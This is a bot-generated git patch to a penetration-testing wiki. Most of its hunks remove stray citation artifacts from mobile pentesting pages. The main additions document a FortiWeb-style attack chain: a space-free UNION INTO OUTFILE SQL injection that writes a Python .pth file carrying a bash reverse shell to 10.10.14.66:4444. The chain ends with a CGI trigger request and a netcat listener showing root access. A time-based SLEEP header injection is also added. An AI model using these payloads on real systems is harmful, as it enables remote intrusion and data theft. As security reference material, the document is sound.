From 44cd43b24fd3cbf2a83f37cf4de5b5d4f57ac897 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Fri, 11 Jul 2025 18:33:07 +0000
Subject: [PATCH] Add content from: Pre-auth SQL Injection to RCE in Fortinet
 FortiWeb Fabric Co...

---
 .../reversing-native-libraries.md             |  8 +--
 .../ios-pentesting-without-jailbreak.md       |  2 +-
 .../pentesting-mysql.md                       | 55 ++++++++++++++++++-
 .../sql-injection/ms-access-sql-injection.md  |  4 +-
 .../sql-injection/mysql-injection/README.md   | 31 ++++++++++-
 5 files changed, 90 insertions(+), 10 deletions(-)

diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
index 03213da5080..ea060841d8a 100644
--- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
+++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
@@ -61,7 +61,7 @@ Java.perform(function () {
   });
 });
 ```
-Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  citeturn5search2turn5search0
+Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  
 
 ---
 
@@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+)
 
 | Year | CVE | Affected library | Notes |
 |------|-----|------------------|-------|
-|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0|
+|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
 |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
 
 When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
@@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their
 
 ### References
 
-- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  citeturn5search0
-- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0
+- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  
+- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
index 004d7bf0e0e..791da2761f0 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md
index d7f9cd8abf9..108401951aa 100644
--- a/src/network-services-pentesting/pentesting-mysql.md
+++ b/src/network-services-pentesting/pentesting-mysql.md
@@ -1,5 +1,10 @@
 # 3306 - Pentesting Mysql
 
+{{#include /banners/hacktricks-training.md}}
+
+## References
+- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
+
 {{#include ../banners/hacktricks-training.md}}
 
 ## **Basic Information**
@@ -123,6 +128,52 @@ You can see in the docs the meaning of each privilege: [https://dev.mysql.com/do
 ../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
 {{#endref}}
 
+#### INTO OUTFILE → Python `.pth` RCE (site-specific configuration hooks)
+
+Abusing the classic `INTO OUTFILE` primitive it is possible to obtain *arbitrary code execution* on targets that later run **Python** scripts.
+
+1. Use `INTO OUTFILE` to drop a custom **`.pth`** file inside any directory loaded automatically by `site.py` (e.g. `.../lib/python3.10/site-packages/`).
+2. The `.pth` file can contain a *single line* starting with `import ` followed by arbitrary Python code which will be executed every time the interpreter starts.
+3. When the interpreter is implicitly executed by a CGI script (for example `/cgi-bin/ml-draw.py` with shebang `#!/bin/python`) the payload is executed with the same privileges as the web-server process (FortiWeb ran it as **root** → full pre-auth RCE).
+
+Example `.pth` payload (single line, no spaces can be included in the final SQL payload, so hex/`UNHEX()` or string concatenation may be required):
+
+```python
+import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)
+```
+
+Example of crafting the file through an **UNION** query (space characters replaced with `/**/` to bypass an `sscanf("%128s")` space filter and keep the total length ≤128 bytes):
+
+```sql
+'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'
+```
+
+Important limitations & bypasses:
+
+* `INTO OUTFILE` **cannot overwrite** existing files; choose a new filename.
+* The file path is resolved **relative to MySQL’s CWD**, so prefixing with `../../` helps to shorten the path and bypass absolute-path restrictions.
+* If the attacker input is extracted with `%128s` (or similar) any space will truncate the payload; use MySQL comment sequences `/**/` or `/*!*/` to replace spaces.
+* The MySQL user running the query needs the `FILE` privilege, but in many appliances (e.g. FortiWeb) the service runs as **root**, giving write access almost everywhere.
+
+After dropping the `.pth`, simply request any CGI handled by the python interpreter to get code execution:
+
+```
+GET /cgi-bin/ml-draw.py HTTP/1.1
+Host: <target>
+```
+
+The Python process will import the malicious `.pth` automatically and execute the shell payload.
+
+```
+# Attacker
+$ nc -lvnp 4444
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+---
+
+
 ## MySQL arbitrary read file by client
 
 Actually, when you try to **load data local into a table** the **content of a file** the MySQL or MariaDB server asks the **client to read it** and send the content. **Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.**\
@@ -645,7 +696,9 @@ Entry_4:
 
 ​
 
-{{#include ../banners/hacktricks-training.md}}
+## References
+- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
 
+{{#include ../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index 913a7a03f98..5b9778a7ad4 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -141,7 +141,7 @@ Point the UNC path to:
 * a host that drops the TCP handshake after `SYN-ACK`
 * a firewall sinkhole
 
-The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
+The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. 
 
 ### Other Interesting functions
 
@@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
 * Block outbound SMB/WebDAV at the network boundary.
 * Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
 
-The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
+The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. 
 
 ### .mdb Password Cracker
 
diff --git a/src/pentesting-web/sql-injection/mysql-injection/README.md b/src/pentesting-web/sql-injection/mysql-injection/README.md
index b22dcd22746..5990df348de 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/README.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/README.md
@@ -160,6 +160,32 @@ select (select 1, 'flaf') = (SELECT * from demo limit 1);
 
 More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
 
+### Injection without SPACES (`/**/` comment trick)
+
+Some applications sanitise or parse user input with functions such as `sscanf("%128s", buf)` which **stop at the first space character**.  
+Because MySQL treats the sequence `/**/` as a comment *and* as whitespace, it can be used to completely remove normal spaces from the payload while keeping the query syntactically valid.
+
+Example time-based blind injection bypassing the space filter:
+
+```http
+GET /api/fabric/device/status HTTP/1.1
+Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
+```
+
+Which the database receives as:
+
+```sql
+' OR SLEEP(5)-- -'
+```
+
+This is especially handy when:
+
+* The controllable buffer is restricted in size (e.g. `%128s`) and spaces would prematurely terminate the input.
+* Injecting through HTTP headers or other fields where normal spaces are stripped or used as separators.
+* Combined with `INTO OUTFILE` primitives to achieve full pre-auth RCE (see the MySQL File RCE section).
+
+---
+
 ### MySQL history
 
 You ca see other executions inside the MySQL reading the table: **sys.x$statement_analysis**
@@ -174,11 +200,12 @@ mysql> select version();
 
 ## Other MYSQL injection guides
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)]
+- [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
 
 ## References
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
+- [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
+- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
 
 
 {{#include ../../../banners/hacktricks-training.md}}